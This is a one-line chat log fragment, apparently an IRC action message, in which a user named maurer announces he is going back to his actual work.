* maurer returns to doing his actual work
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